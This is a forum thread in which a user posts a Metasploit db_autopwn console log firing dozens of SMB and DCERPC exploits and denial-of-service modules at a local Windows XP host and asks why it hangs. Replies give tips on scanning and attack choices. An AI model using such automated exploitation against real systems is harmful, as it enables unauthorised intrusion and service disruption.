Results 1 to 3 of 3

Thread: db_autopwn -p -t -e 192.168.2.7

  1. #1
    Just burned his ISO virusc's Avatar
    Join Date
    Feb 2009
    Posts
    9

    Cool db_autopwn -p -t -e 192.168.2.7

    i used db_autopwn -p -t -e 192.168.2.7
    and it frooze on last line (log below)
    msf > db_autopwn -p -t -e 192.168.2.7[*] Analysis completed in 46.086333990097 seconds (0 vulns / 0 refs)[*] Matched auxiliary/scanner/dcerpc/endpoint_mapper against 192.168.2.7:135...[*] Matched auxiliary/dos/samba/lsa_addprivs_heap against 192.168.2.7:445...[*] Matched exploit/windows/smb/ms06_066_nwwks against 192.168.2.7:445...[*] (3/34): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.2.7:445...[*] Matched exploit/windows/smb/ms04_011_lsass against 192.168.2.7:445...[*] (4/34): Launching exploit/windows/smb/ms04_011_lsass against 192.168.2.7:445...
    [*] Connecting to the SMB service...[*] Started bind handler[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against 192.168.2.7:445...[*] Started bind handler[*] Matched auxiliary/dos/windows/smb/ms09_001_write against 192.168.2.7:445...[*] Matched auxiliary/dos/windows/smb/ms06_063_trans against 192.168.2.7:445...[*] Matched exploit/windows/smb/ms06_040_netapi against 192.168.2.7:445...[*] (8/34): Launching exploit/windows/smb/ms06_040_netapi against 192.168.2.7:445...[*] Started bind handler[*] Matched exploit/windows/smb/psexec against 192.168.2.7:445...[*] (9/34): Launching exploit/windows/smb/psexec against 192.168.2.7:445...[*] Binding to e67ab081-9844-3521-9d32-834f038001c0:1.0@ncacn_np:192.168.2.7[\nwwks] ...[*] Started bind handler[*] Connecting to the server...[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.2.7[\lsarpc]...[*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.2.7:445...[*] Authenticating as user 'Administrator'...[*] (10/34): Launching exploit/windows/smb/ms05_039_pnp against 192.168.2.7:445...
    [-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
    [-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)[*] Matched exploit/windows/smb/ms04_007_killbill against 192.168.2.7:445...[*] Started bind handler
    [-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)[*] Connecting to the SMB service...[*] Matched exploit/windows/smb/ms06_025_rras against 192.168.2.7:445...[*] Windows XP SP2 is not exploitable[*] Matched exploit/windows/smb/ms04_031_netdde against 192.168.2.7:445...[*] (13/34): Launching exploit/windows/smb/ms04_031_netdde against 192.168.2.7:445...[*] Matched exploit/windows/smb/ms03_049_netapi against 192.168.2.7:445...[*] Started bind handler[*] (14/34): Launching exploit/windows/smb/ms03_049_netapi against 192.168.2.7:445...[*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.2.7[\browser] ...[*] Started bind handler[*] Matched exploit/windows/brightstor/etrust_itm_alert against 192.168.2.7:445...[*] (15/34): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.2.7:445...[*] Started bind handler[*] Matched auxiliary/dos/samba/lsa_transnames_heap against 192.168.2.7:445...[*] Matched exploit/windows/smb/msdns_zonename against 192.168.2.7:445...[*] (17/34): Launching exploit/windows/smb/msdns_zonename against 192.168.2.7:445...[*] Trying target Windows 2000 SP4...[*] Binding to 2f5f3220-c126-1076-b549-074d078619da:1.2@ncacn_np:192.168.2.7[\nddeapi][*] Binding to 6bffd098-a112-3610-9833-46c3f87e345a:1.0@ncacn_np:192.168.2.7[\BROWSER] ...
    [-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)[*] Started bind handler[*] Matched exploit/osx/samba/lsa_transnames_heap against 192.168.2.7:445...[*] (18/34): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.2.7:445...
    [-] Exploit failed: Could not bind to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.2.7[\browser][*] Binding to 3d742890-397c-11cf-9bf1-00805f88cb72:1.0@ncacn_np:192.168.2.7[\alert] ...[*] Matched auxiliary/scanner/smb/login against 192.168.2.7:445...
    [-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)[*] Matched exploit/netware/smb/lsass_cifs against 192.168.2.7:445...[*] (20/34): Launching exploit/netware/smb/lsass_cifs against 192.168.2.7:445...[*] Detected a Windows XP system...[*] There is no available target for this OS locale[*] Matched auxiliary/dos/windows/smb/vista_negotiate_stop against 192.168.2.7:445...[*] Bound to 6bffd098-a112-3610-9833-46c3f87e345a:1.0@ncacn_np:192.168.2.7[\BROWSER] ...[*] Matched auxiliary/admin/db2/db2rcmd against 192.168.2.7:445...[*] Building the stub data...[*] Matched exploit/windows/smb/ms06_025_rasmans_reg against 192.168.2.7:445...[*] Calling the vulnerable function...[*] Matched exploit/windows/dcerpc/ms03_026_dcom against 192.168.2.7:135...[*] (24/34): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.2.7:135...[*] Matched exploit/multi/samba/nttrans against 192.168.2.7:139...[*] (25/34): Launching exploit/multi/samba/nttrans against 192.168.2.7:139...[*] Started bind handler[*] Matched auxiliary/scanner/dcerpc/management against 192.168.2.7:135...[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.2.7[135] ...[*] Matched exploit/windows/smb/ms08_067_netapi against 192.168.2.7:445...[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.2.7[135] ...[*] (27/34): Launching exploit/windows/smb/ms08_067_netapi against 192.168.2.7:445...[*] Started bind handler[*] Matched exploit/linux/samba/lsa_transnames_heap against 192.168.2.7:445...[*] Sending exploit ...
    [-] Exploit failed: DCERPC FAULT => nca_s_fault_access_denied[*] Matched auxiliary/dos/windows/smb/ms05_047_pnp against 192.168.2.7:445...[*] Matched exploit/windows/smb/ms06_066_nwapi against 192.168.2.7:445...[*] (30/34): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.2.7:445...[*] Automatically detecting the target...
    [-] Exploit failed: No encoders encoded the buffer successfully.[*] Matched exploit/solaris/samba/lsa_transnames_heap against 192.168.2.7:445...[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.2.7:445...[*] Matched exploit/solaris/samba/trans2open against 192.168.2.7:139...[*] (33/34): Launching exploit/solaris/samba/trans2open against 192.168.2.7:139...[*] Matched exploit/osx/samba/trans2open against 192.168.2.7:139...
    msf >[*] Fingerprint: Windows XP Service Pack 3 - lang:English[*] Selected Target: Windows XP SP3 English (NX)[*] Triggering the vulnerability...
    any ideas why it freezes here plz ppl ?

  2. #2
    Just burned his ISO
    Join Date
    Apr 2009
    Posts
    1

    Default

    It could be that the exploit was just taking a while to run. Honestly though, don't use db_autopwn to fling exploits at the target. It's just impractical and only good if your doing it on your local network. Instead, try using Nessus against the target to generate a report and then load the report into the Metasploit db (db_import_nessus_nbe) and use db_autopwn -t -x for it to only show you the exploits instead of actually exploiting it.

  3. #3
    Member
    Join Date
    Jan 2010
    Location
    The new forums
    Posts
    462

    Default

    How long did you let it hang? Sometimes db_autopwn is running multiple exploits and takes a while to complete them. Also from another thread you mentioned you just wanted to get "remote access" to a PC without making any changes to it. If you are using XP SP3 you probably are not going to hit anything from Metasploit. Try using a fresh copy of XP SP0 - SP2, or add some 3rd party programs to exploit. If you don't want to try that then I recommend setting up a client side attack.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •